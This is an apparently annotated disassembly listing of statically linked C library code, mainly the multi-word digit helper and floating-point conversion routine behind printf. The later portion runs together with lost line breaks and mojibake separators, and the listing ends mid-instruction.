        add esp, 4

loc_80531C6: ; CODE XREF: sub_80531A8+Bj
        ; sub_80531A8+10j
        mov dword ptr [ebx+1Ch], 0
        push ebx
        call sub_8061FC0
        mov ebx, [ebp+var_4]
        mov esp, ebp
        pop ebp
        retn
sub_80531A8 endp

; ---------------------------------------------------------------------------
        db 2 dup(90h)

; =============== S U B R O U T I N E =======================================
;
; sub_80531DC -- produce the next decimal digit of a multi-word number kept in
; the caller's stack frame. Called only from sub_8053310. Shape matches the
; nested hack_digit helper of GNU libc's floating-point printf -- TODO confirm.
;
; Input:  ecx = base pointer for the caller's locals (presumably the frame
;         pointer of sub_8053310, passed as a static chain -- confirm).
;         All state is accessed as [ecx - offset]; the names on the right are
;         the ones GNU libc uses and are an assumption:
;           -10h non-zero enables the leading-zero shortcut   (expsign)
;           -14h conversion character, compared with 66h 'f'  (type)
;           -18h counter decremented on every call            (exponent)
;           -1Ch word count of the divisor, 0 = no divisor    (scalesize)
;           -20h pointer to the number's words                (frac)
;           -24h word count of the number                     (fracsize)
;           -28h last carry word                              (cy)
;           -2Ch pointer to the divisor's words               (scale)
;           -30h pointer to a scratch word array              (tmp)
; Output: eax = (digit + 30h) and 0FFh, i.e. the digit as an ASCII character.
;
; sub_8058DE0 is called as (dst, src, words, 0Ah) and its result is stored as
; a carry word; sub_8058094 is called as (tmp, number, words, divisor, words).
; Presumably multi-word multiply-by-one-word and divide routines -- confirm.
;
; Attributes: bp-based frame hidden

sub_80531DC proc near ; CODE XREF: sub_8053310+12A2p
        ; sub_8053310+12AFp ...

var_C = byte ptr -0Ch
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        sub esp, 4
        push esi
        push ebx
        mov [ebp+var_4], ecx
        mov ebx, [ebp+var_4] ; ebx = base of the caller's locals
        cmp dword ptr [ebx-10h], 0
        jz short loc_8053208
        cmp dword ptr [ebx-14h], 66h
        jnz short loc_8053208
        mov eax, [ebx-18h]
        dec dword ptr [ebx-18h] ; decremented whether or not the test passes
        test eax, eax
        jle short loc_8053208
        xor esi, esi ; shortcut: the digit is 0
        jmp loc_80532FD
; ---------------------------------------------------------------------------
        align 4

loc_8053208: ; CODE XREF: sub_80531DC+12j
        ; sub_80531DC+18j ...
        cmp dword ptr [ebx-1Ch], 0
        jnz short loc_8053238
        ; no divisor: the digit is the top word, then multiply the rest by 10
        mov eax, [ebx-24h]
        mov edx, [ebx-20h]
        mov esi, [edx+eax*4-4] ; esi = top word = digit
        push 0Ah
        dec eax
        push eax
        push edx
        push edx
        call sub_8058DE0 ; (number, number, words - 1, 10)
        mov ecx, eax
        mov [ebx-28h], ecx
        mov edx, [ebx-24h]
        mov eax, [ebx-20h]
        mov [eax+edx*4-4], ecx ; the carry becomes the new top word
        jmp loc_80532FD
; ---------------------------------------------------------------------------
        align 4

loc_8053238: ; CODE XREF: sub_80531DC+30j
        mov eax, [ebx-24h]
        cmp [ebx-1Ch], eax
        jle short loc_8053250
        xor esi, esi ; number has fewer words than the divisor: digit is 0
        jmp loc_80532D8
; ---------------------------------------------------------------------------
        align 4

loc_8053248: ; CODE XREF: sub_80531DC+CDj
        ; sub_80531DC+D4j ...
        lea eax, [edx+1] ; new word count = index of the top non-zero word + 1
        jmp short loc_80532C6
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8053250: ; CODE XREF: sub_80531DC+62j
        mov eax, [ebx-1Ch]
        push eax
        mov eax, [ebx-2Ch]
        push eax
        mov eax, [ebx-24h]
        push eax
        mov eax, [ebx-20h]
        push eax
        mov eax, [ebx-30h]
        push eax
        call sub_8058094 ; (tmp, number, words, divisor, divisor words)
        mov esi, eax
        mov edx, [ebx-24h]
        sub edx, [ebx-1Ch]
        mov eax, [ebx-30h]
        mov [eax+edx*4], esi ; store the returned word at tmp[words - divisor words]
        mov eax, [ebx-30h]
        mov esi, [eax] ; esi = tmp[0] = digit
        mov ecx, [ebx-20h]
        mov edx, [ebx-1Ch]
        add esp, 14h
        test edx, edx
        jz short loc_80532C4
        ; Strip zero words from the top of the number, starting at the
        ; divisor's word count. The scan is unrolled four times; the compares
        ; below choose the entry point from the count modulo 4.
        mov eax, edx
        neg eax
        and eax, 3
        test edx, edx
        jle short loc_80532B9
        test eax, eax
        jz short loc_80532A4
        cmp eax, 3
        jge short loc_80532B9
        cmp eax, 2
        jge short loc_80532B2
        jmp short loc_80532AB
; ---------------------------------------------------------------------------

loc_80532A4: ; CODE XREF: sub_80531DC+BAj
        ; sub_80531DC+E6j
        dec edx
        cmp dword ptr [ecx+edx*4], 0
        jnz short loc_8053248

loc_80532AB: ; CODE XREF: sub_80531DC+C6j
        dec edx
        cmp dword ptr [ecx+edx*4], 0
        jnz short loc_8053248

loc_80532B2: ; CODE XREF: sub_80531DC+C4j
        dec edx
        cmp dword ptr [ecx+edx*4], 0
        jnz short loc_8053248

loc_80532B9: ; CODE XREF: sub_80531DC+B6j
        ; sub_80531DC+BFj
        dec edx
        cmp dword ptr [ecx+edx*4], 0
        jnz short loc_8053248
        test edx, edx
        jnz short loc_80532A4

loc_80532C4: ; CODE XREF: sub_80531DC+ABj
        xor eax, eax ; every word was zero

loc_80532C6: ; CODE XREF: sub_80531DC+6Fj
        mov [ebx-24h], eax
        test eax, eax
        jnz short loc_80532D8
        mov dword ptr [ebx-24h], 1 ; number is zero: keep one word, skip the multiply
        jmp short loc_80532FD
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_80532D8: ; CODE XREF: sub_80531DC+66j
        ; sub_80531DC+EFj
        push 0Ah
        mov eax, [ebx-24h]
        push eax
        mov eax, [ebx-20h]
        push eax
        push eax
        call sub_8058DE0 ; (number, number, words, 10)
        mov ecx, eax
        mov [ebx-28h], ecx
        test ecx, ecx
        jz short loc_80532FD
        mov edx, [ebx-24h]
        mov eax, [ebx-20h]
        mov [eax+edx*4], ecx ; non-zero carry: append it as a new top word
        inc dword ptr [ebx-24h]

loc_80532FD: ; CODE XREF: sub_80531DC+26j
        ; sub_80531DC+56j ...
        mov eax, esi
        add al, 30h ; digit value to ASCII
        and eax, 0FFh
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        mov esp, ebp
        pop ebp
        retn
sub_80531DC endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================
;
; sub_8053310 -- referenced only as data from vfprintf (an address taken, not
; a direct call) and the only listed caller of sub_80531DC. Presumably the
; floating-point conversion routine of the C library's printf -- TODO confirm
; with library signatures. Further down, this routine references the string
; "@(#) The Linux C library 5.3.12", which suggests that this whole group of
; routines is statically linked runtime support rather than logic specific to
; the analysed program.
;
;   arg_0, arg_4, arg_8  three stack arguments; arg_8 is loaded into ebx here
;
; The visible start clears four locals, measures the NUL-terminated string at
; [dword_8078890 + 0Ch] with an inline strlen and passes it to sub_805602C
; together with the address of var_34. When that call returns 0 or less, the
; first byte of the string is used instead. The body continues well beyond
; this part of the listing.
;
; Attributes: bp-based frame hidden

sub_8053310 proc near ; DATA XREF: vfprintf+1176o
        ; vfprintf+2BF8o

var_164 = byte ptr -164h
var_162 = byte ptr -162h
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h

        push ebp
        mov ebp, esp
        sub esp, 158h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+arg_8]
        mov [ebp+var_54], 0
        mov [ebp+var_10], 0
        mov [ebp+var_3C], 0
        mov [ebp+var_5C], 0
        mov eax, dword_8078890
        mov eax, [eax+0Ch]
        mov [ebp+var_A0], eax ; var_A0 = string pointer read from the global table
        mov edi, [ebp+var_A0]
        xor al, al
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb ; inline strlen
        mov esi, ecx
        not esi
        mov eax, esi
        dec eax
        push eax
        mov edx, [ebp+var_A0]
        push edx
        lea ecx, [ebp+var_34]
        push ecx
        call sub_805602C ; (&var_34, string, length); presumably a multibyte decoder -- confirm
        mov esi, eax
        add esp, 0Ch
        test esi, esi
        jg short loc_8053388
        ; fallback: take the first byte of the string
        mov eax, dword_8078890
        mov eax, [eax+0Ch]
        ; The listing breaks the next instruction across lines: its operand
        ; `[eax]` opens the following listing line.
        movzx eax, byte ptr
[eax] mov [ebp+var_34], eax loc_8053388: ; CODE XREF: sub_8053310+68j mov eax, [ebp+arg_4] cmp dword ptr [eax+28h], 0 jz short loc_80533E6 mov edx, dword_8078890 mov edx, [edx+14h] mov [ebp+var_50], edx cmp byte ptr [edx], 0 jz short loc_80533E6 cmp byte ptr [edx], 0FFh jz short loc_80533E6 mov eax, dword_8078890 mov edx, [eax+10h] xor al, al mov edi, edx cld mov ecx, 0FFFFFFFFh repne scasb mov eax, ecx not eax dec eax push eax push edx lea eax, [ebp+var_38] push eax call sub_805602C add esp, 0Ch test eax, eax jg short loc_80533E0 mov eax, dword_8078890 mov eax, [eax+10h] movzx eax, byte ptr [eax] mov [ebp+var_38], eax loc_80533E0: ; CODE XREF: sub_8053310+C0j cmp [ebp+var_38], 0 jnz short loc_80533ED loc_80533E6: ; CODE XREF: sub_8053310+7Fj ; sub_8053310+90j ... mov [ebp+var_50], 0 loc_80533ED: ; CODE XREF: sub_8053310+D4j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+0Ch], 0 jz loc_8053494 mov eax, [ebx] mov edx, [eax] mov ecx, [eax+4] mov dword ptr [ebp+var_C], edx mov dword ptr [ebp+var_C+4], ecx mov edx, [eax+8] mov [ebp+var_4], edx mov eax, [ebp+var_4] mov edx, dword ptr [ebp+var_C+4] push eax push edx mov eax, dword ptr [ebp+var_C] push eax call sub_8057F0C add esp, 0Ch test eax, eax jnz loc_80534B5 mov eax, [ebp+var_4] mov edx, dword ptr [ebp+var_C+4] push eax push edx mov eax, dword ptr [ebp+var_C] push eax call sub_8057E98 add esp, 0Ch test eax, eax jz short loc_8053460 mov [ebp+var_54], offset unk_8067F88 fldz fld tbyte ptr [ebp+var_C] fcompp st(1), st fnstsw ax and ah, 45h cmp ah, 1 setz al jmp loc_80534F0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053460: ; CODE XREF: sub_8053310+12Fj mov eax, [ebp+var_4] mov edx, dword ptr [ebp+var_C+4] push eax push edx mov eax, dword ptr [ebp+var_C] push eax lea eax, [ebp+var_3C] push eax lea eax, [ebp+var_18] push eax push 2 lea eax, [ebp+var_44] push eax call sub_8058634 mov [ebp+var_24], eax shl eax, 5 add eax, 0FFFFFFC1h mov [ebp+var_58], eax add esp, 1Ch jmp loc_8053526 ; 
陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053494: ; CODE XREF: sub_8053310+E4j mov eax, [ebx] mov edx, [eax] mov ecx, [eax+4] mov dword ptr [ebp+var_C], edx mov dword ptr [ebp+var_C+4], ecx mov eax, dword ptr [ebp+var_C+4] mov edx, dword ptr [ebp+var_C] push eax push edx call sub_8057ED8 add esp, 8 test eax, eax jz short loc_80534C8 loc_80534B5: ; CODE XREF: sub_8053310+113j mov [ebp+var_54], offset unk_8067F84 mov [ebp+var_3C], 0 jmp short loc_8053526 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80534C8: ; CODE XREF: sub_8053310+1A3j mov eax, dword ptr [ebp+var_C+4] mov edx, dword ptr [ebp+var_C] push eax push edx call sub_8057E64 add esp, 8 test eax, eax jz short loc_80534FC mov [ebp+var_54], offset unk_8067F88 fldz fcomp [ebp+var_C] fnstsw ax and ah, 45h setz al loc_80534F0: ; CODE XREF: sub_8053310+14Aj and eax, 0FFh mov [ebp+var_3C], eax jmp short loc_8053526 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80534FC: ; CODE XREF: sub_8053310+1CAj mov eax, dword ptr [ebp+var_C+4] mov edx, dword ptr [ebp+var_C] push eax push edx lea eax, [ebp+var_3C] push eax lea eax, [ebp+var_18] push eax push 2 lea eax, [ebp+var_44] push eax call sub_8057F88 mov [ebp+var_24], eax shl eax, 5 add eax, 0FFFFFFCCh mov [ebp+var_58], eax add esp, 18h loc_8053526: ; CODE XREF: sub_8053310+17Ej ; sub_8053310+1B3j ... 
cmp [ebp+var_54], 0 jz loc_80536C4 mov eax, [ebp+arg_4] mov esi, [eax] cmp [eax+4], esi jle short loc_805353D mov esi, [eax+4] loc_805353D: ; CODE XREF: sub_8053310+228j cmp [ebp+var_3C], 0 jnz short loc_8053552 mov edx, [ebp+arg_4] cmp dword ptr [edx+24h], 0 jnz short loc_8053552 cmp dword ptr [edx+1Ch], 0 jz short loc_8053553 loc_8053552: ; CODE XREF: sub_8053310+231j ; sub_8053310+23Aj dec esi loc_8053553: ; CODE XREF: sub_8053310+240j add esi, 0FFFFFFFDh mov ecx, [ebp+arg_4] cmp dword ptr [ecx+20h], 0 jnz short loc_805357F test esi, esi jle short loc_805357F push esi push 20h mov eax, [ebp+arg_0] push eax call sub_8062534 mov ebx, eax add esp, 0Ch cmp ebx, esi jnz loc_8054BD6 add [ebp+var_5C], esi loc_805357F: ; CODE XREF: sub_8053310+24Dj ; sub_8053310+251j cmp [ebp+var_3C], 0 jz short loc_80535C0 mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, [ebp+arg_0] cmp [ecx+18h], edx ja short loc_80535AC push 2Dh push ecx loc_8053596: ; CODE XREF: sub_8053310+2CAj ; sub_8053310+2FAj call sub_8061910 mov ebx, eax add esp, 8 cmp ebx, 0FFFFFFFFh jz loc_8054BD6 jmp short loc_805361B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80535AC: ; CODE XREF: sub_8053310+281j mov eax, [ebp+arg_0] mov eax, [eax+14h] mov byte ptr [eax], 2Dh mov edx, [ebp+arg_0] inc dword ptr [edx+14h] jmp short loc_805361B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80535C0: ; CODE XREF: sub_8053310+273j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+24h], 0 jz short loc_80535F0 mov eax, [ebp+arg_0] mov eax, [eax+14h] mov edx, [ebp+arg_0] cmp [edx+18h], eax ja short loc_80535DC push 2Bh push edx jmp short loc_8053596 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80535DC: ; CODE XREF: sub_8053310+2C5j mov ecx, [ebp+arg_0] mov ecx, [ecx+14h] mov byte ptr [ecx], 2Bh mov eax, [ebp+arg_0] inc dword ptr [eax+14h] jmp short loc_805361B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80535F0: ; CODE XREF: 
sub_8053310+2B7j mov edx, [ebp+arg_4] cmp dword ptr [edx+1Ch], 0 jz short loc_805361E mov ecx, [ebp+arg_0] mov ecx, [ecx+14h] mov eax, [ebp+arg_0] cmp [eax+18h], ecx ja short loc_805360C push 20h push eax jmp short loc_8053596 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805360C: ; CODE XREF: sub_8053310+2F5j mov edx, [ebp+arg_0] mov edx, [edx+14h] mov byte ptr [edx], 20h mov ecx, [ebp+arg_0] inc dword ptr [ecx+14h] loc_805361B: ; CODE XREF: sub_8053310+299j ; sub_8053310+2ABj ... inc [ebp+var_5C] loc_805361E: ; CODE XREF: sub_8053310+2E7j mov ebx, 2 nop loc_8053624: ; CODE XREF: sub_8053310+37Ej mov eax, [ebp+var_54] movzx edi, byte ptr [eax] inc eax mov [ebp+var_54], eax mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, [ebp+arg_0] cmp [ecx+18h], edx ja short loc_8053660 mov eax, edi movzx edi, al mov [ebp+var_9C], edi push edi push ecx call sub_8061910 mov edi, eax add esp, 8 cmp edi, 0FFFFFFFFh jz loc_8054BD6 jmp short loc_8053686 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8053660: ; CODE XREF: sub_8053310+32Aj mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, edi mov byte ptr [ebp+var_A0], cl mov [edx], cl movzx eax, byte ptr [ebp+var_A0] mov edx, [ebp+arg_0] inc dword ptr [edx+14h] cmp eax, 0FFFFFFFFh jz loc_8054BD6 loc_8053686: ; CODE XREF: sub_8053310+34Cj inc [ebp+var_5C] mov eax, ebx dec ebx test eax, eax jnz short loc_8053624 mov ecx, [ebp+arg_4] cmp dword ptr [ecx+20h], 0 jz loc_8054C18 test esi, esi jle loc_8054C18 push esi push 20h mov eax, [ebp+arg_0] push eax call sub_8062534 mov ebx, eax cmp ebx, esi jnz loc_8054BD6 add [ebp+var_5C], esi jmp loc_8054C18 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80536C4: ; CODE XREF: sub_8053310+21Aj mov esi, [ebp+var_18] test esi, esi jge short loc_80536CD neg esi loc_80536CD: ; CODE XREF: sub_8053310+3B9j add esi, 1Fh mov ebx, esi jns short loc_80536D7 lea ebx, [esi+1Fh] loc_80536D7: ; CODE XREF: sub_8053310+3C2j mov eax, ebx sar eax, 5 lea eax, 
ds:10h[eax*4] sub esp, eax mov [ebp+var_20], esp sub esp, eax mov [ebp+var_30], esp sub esp, eax mov [ebp+var_2C], esp mov [ebp+var_1C], 0 cmp [ebp+var_18], 2 jle loc_8053F0C xor edi, edi mov [ebp+var_60], 0Ch mov [ebp+var_64], 0 mov [ebp+var_68], offset a@TheLinuxCLibr ; "@(#) The Linux C library 5.3.12" mov edx, [ebp+var_58] add edx, [ebp+var_18] mov [ebp+var_A0], edx test dl, 1Fh jnz loc_8053928 mov ecx, [ebp+var_24] dec ecx mov [ebp+var_A4], ecx js loc_8053912 lea ebx, ds:0[ecx*4] not ecx mov esi, ecx and esi, 3 cmp [ebp+var_A4], 0FFFFFFFFh jle short loc_80537C8 test esi, esi jz loc_8053800 cmp esi, 3 jge short loc_80537C8 cmp esi, 2 jge short loc_8053799 mov esi, [ebp+var_A0] test esi, esi jge short loc_8053775 add esi, 1Fh loc_8053775: ; CODE XREF: sub_8053310+460j sar esi, 5 mov [ebp+var_9C], esi lea eax, [ebx+esi*4] add eax, [ebp+var_20] mov edx, [ebp+var_A4] mov edx, [ebp+edx*4+var_44] mov [eax], edx add ebx, 0FFFFFFFCh dec [ebp+var_A4] loc_8053799: ; CODE XREF: sub_8053310+456j mov esi, [ebp+var_58] add esi, [ebp+var_18] jns short loc_80537A4 add esi, 1Fh loc_80537A4: ; CODE XREF: sub_8053310+48Fj sar esi, 5 mov [ebp+var_9C], esi lea ecx, [ebx+esi*4] add ecx, [ebp+var_20] mov eax, [ebp+var_A4] mov eax, [ebp+eax*4+var_44] mov [ecx], eax add ebx, 0FFFFFFFCh dec [ebp+var_A4] loc_80537C8: ; CODE XREF: sub_8053310+444j ; sub_8053310+451j mov esi, [ebp+var_58] add esi, [ebp+var_18] jns short loc_80537D3 add esi, 1Fh loc_80537D3: ; CODE XREF: sub_8053310+4BEj sar esi, 5 mov [ebp+var_9C], esi lea edx, [ebx+esi*4] add edx, [ebp+var_20] mov ecx, [ebp+var_A4] mov ecx, [ebp+ecx*4+var_44] mov [edx], ecx add ebx, 0FFFFFFFCh dec [ebp+var_A4] js loc_8053912 db 8Dh,76h,0 ; lea esi, [esi+0] loc_8053800: ; CODE XREF: sub_8053310+448j ; sub_8053310+5FCj mov esi, [ebp+var_58] add esi, [ebp+var_18] jns short loc_805380B add esi, 1Fh loc_805380B: ; CODE XREF: sub_8053310+4F6j sar esi, 5 mov [ebp+var_9C], esi lea eax, [ebx+esi*4] add eax, [ebp+var_20] mov edx, [ebp+var_A4] mov 
edx, [ebp+edx*4+var_44] mov [eax], edx lea ecx, [ebx-4] mov [ebp+var_A0], ecx mov esi, [ebp+var_A4] dec esi mov eax, [ebp+var_58] add eax, [ebp+var_18] mov [ebp+var_9C], eax jns short loc_805384D add eax, 1Fh mov [ebp+var_9C], eax loc_805384D: ; CODE XREF: sub_8053310+532j mov edx, [ebp+var_9C] sar edx, 5 mov ecx, [ebp+var_A0] lea ecx, [ecx+edx*4] add ecx, [ebp+var_20] mov esi, [ebp+esi*4+var_44] mov [ebp+var_150], esi mov [ecx], esi lea eax, [ebx-8] mov [ebp+var_A0], eax mov esi, [ebp+var_A4] add esi, 0FFFFFFFEh mov edx, [ebp+var_58] add edx, [ebp+var_18] mov [ebp+var_9C], edx jns short loc_8053897 add edx, 1Fh mov [ebp+var_9C], edx loc_8053897: ; CODE XREF: sub_8053310+57Cj mov ecx, [ebp+var_9C] sar ecx, 5 mov eax, [ebp+var_A0] lea eax, [eax+ecx*4] add eax, [ebp+var_20] mov esi, [ebp+esi*4+var_44] mov [ebp+var_154], esi mov [eax], esi lea edx, [ebx-0Ch] mov [ebp+var_A0], edx mov esi, [ebp+var_A4] add esi, 0FFFFFFFDh mov ecx, [ebp+var_58] add ecx, [ebp+var_18] mov [ebp+var_9C], ecx jns short loc_80538E1 add ecx, 1Fh mov [ebp+var_9C], ecx loc_80538E1: ; CODE XREF: sub_8053310+5C6j mov eax, [ebp+var_9C] sar eax, 5 mov edx, [ebp+var_A0] lea edx, [edx+eax*4] add edx, [ebp+var_20] mov esi, [ebp+esi*4+var_44] mov [ebp+var_158], esi mov [edx], esi add ebx, 0FFFFFFF0h add [ebp+var_A4], 0FFFFFFFCh jns loc_8053800 loc_8053912: ; CODE XREF: sub_8053310+429j ; sub_8053310+4E7j mov ebx, [ebp+var_58] add ebx, [ebp+var_18] jns short loc_805391D add ebx, 1Fh loc_805391D: ; CODE XREF: sub_8053310+608j mov eax, ebx sar eax, 5 add [ebp+var_24], eax jmp short loc_8053999 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053928: ; CODE XREF: sub_8053310+419j mov ebx, [ebp+var_58] add ebx, [ebp+var_18] mov esi, ebx jns short loc_8053935 lea esi, [ebx+1Fh] loc_8053935: ; CODE XREF: sub_8053310+620j mov eax, esi and al, 0E0h sub ebx, eax mov eax, ebx push eax mov eax, [ebp+var_24] push eax lea eax, [ebp+var_44] push eax mov ebx, [ebp+var_58] add ebx, [ebp+var_18] jns short loc_8053951 
add ebx, 1Fh loc_8053951: ; CODE XREF: sub_8053310+63Cj mov eax, ebx sar eax, 5 shl eax, 2 add eax, [ebp+var_20] push eax call sub_8058710 mov [ebp+var_28], eax mov ebx, [ebp+var_58] add ebx, [ebp+var_18] jns short loc_8053970 add ebx, 1Fh loc_8053970: ; CODE XREF: sub_8053310+65Bj mov eax, ebx sar eax, 5 add [ebp+var_24], eax add esp, 10h cmp [ebp+var_28], 0 jz short loc_8053999 mov ecx, [ebp+var_24] shl ecx, 2 mov [ebp+var_A4], ecx mov eax, [ebp+var_28] mov edx, [ebp+var_20] mov [edx+ecx], eax inc [ebp+var_24] loc_8053999: ; CODE XREF: sub_8053310+615j ; sub_8053310+66Fj mov [ebp+var_A4], 0 mov ebx, [ebp+var_20] mov [ebp+var_A0], 0 loc_80539B0: ; CODE XREF: sub_8053310+6D4j mov esi, [ebp+var_58] add esi, [ebp+var_18] jns short loc_80539BB add esi, 1Fh loc_80539BB: ; CODE XREF: sub_8053310+6A6j mov eax, esi sar eax, 5 cmp [ebp+var_A4], eax jge short loc_80539E8 mov ecx, [ebp+var_A0] mov dword ptr [ebx+ecx], 0 add ecx, 4 mov [ebp+var_A0], ecx inc [ebp+var_A4] jmp short loc_80539B0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80539E8: ; CODE XREF: sub_8053310+6B6j mov esi, [ebp+var_68] add esi, 4 lea esi, [esi] loc_80539F0: ; CODE XREF: sub_8053310+7D9j add esi, 0FFFFFFF0h add [ebp+var_68], 0FFFFFFF0h mov eax, edi add eax, [esi+4] dec eax cmp [ebp+var_18], eax jl loc_8053ADF cmp [ebp+var_1C], 0 jnz short loc_8053A2C mov eax, [ebp+var_30] mov edx, [ebp+var_68] mov edx, [edx] mov ebx, [esi] lea ecx, ds:0[ebx*4] push ecx push edx push eax call memcpy add esp, 0Ch jmp short loc_8053A6A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8053A2C: ; CODE XREF: sub_8053310+6FAj mov eax, [esi] add eax, 0FFFFFFFEh push eax mov edx, [ebp+var_68] mov edx, [edx] add edx, 8 push edx mov ecx, [ebp+var_1C] push ecx mov eax, [ebp+var_2C] push eax mov edx, [ebp+var_30] push edx call sub_805876C mov [ebp+var_A4], eax mov [ebp+var_28], eax mov ebx, [ebp+var_1C] add ebx, [esi] add ebx, 
0FFFFFFFEh add esp, 14h cmp [ebp+var_A4], 0 jnz short loc_8053A6A dec ebx loc_8053A6A: ; CODE XREF: sub_8053310+718j ; sub_8053310+757j cmp [ebp+var_24], ebx jg short loc_8053A86 jnz short loc_8053ADF push ebx mov eax, [ebp+var_30] push eax mov eax, [ebp+var_20] push eax call sub_8057F48 add esp, 0Ch test eax, eax jl short loc_8053ADF loc_8053A86: ; CODE XREF: sub_8053310+75Dj mov ecx, [ebp+var_2C] mov eax, [ebp+var_30] mov [ebp+var_1C], ebx shl ebx, 2 mov [ebp+var_9C], ebx push ebx push eax push ecx call memcpy add esp, 0Ch mov edx, [ebp+var_1C] shl edx, 2 mov [ebp+var_9C], edx add edx, [ebp+var_2C] add edx, 0FFFFFFFCh bsr ecx, [edx] mov edi, [ebp+var_1C] add edi, 0FFFFFFFEh shl edi, 5 mov [ebp+var_A0], edi mov edi, ecx xor edi, 0FFFFFFE0h add edi, [ebp+var_A0] mov eax, 1 mov ecx, [ebp+var_60] shl eax, cl or [ebp+var_64], eax loc_8053ADF: ; CODE XREF: sub_8053310+6F0j ; sub_8053310+75Fj ... dec [ebp+var_60] cmp [ebp+var_68], offset off_8068DAC ja loc_80539F0 mov edx, [ebp+var_64] mov [ebp+var_18], edx cmp [ebp+var_1C], 0 jle loc_80543D0 xor edi, edi mov esi, [ebp+var_2C] cmp dword ptr [esi], 0 jnz short loc_8053B46 mov ebx, [ebp+var_20] cmp dword ptr [ebx], 0 jnz short loc_8053B46 mov edi, 1 cmp dword ptr [esi+4], 0 jnz short 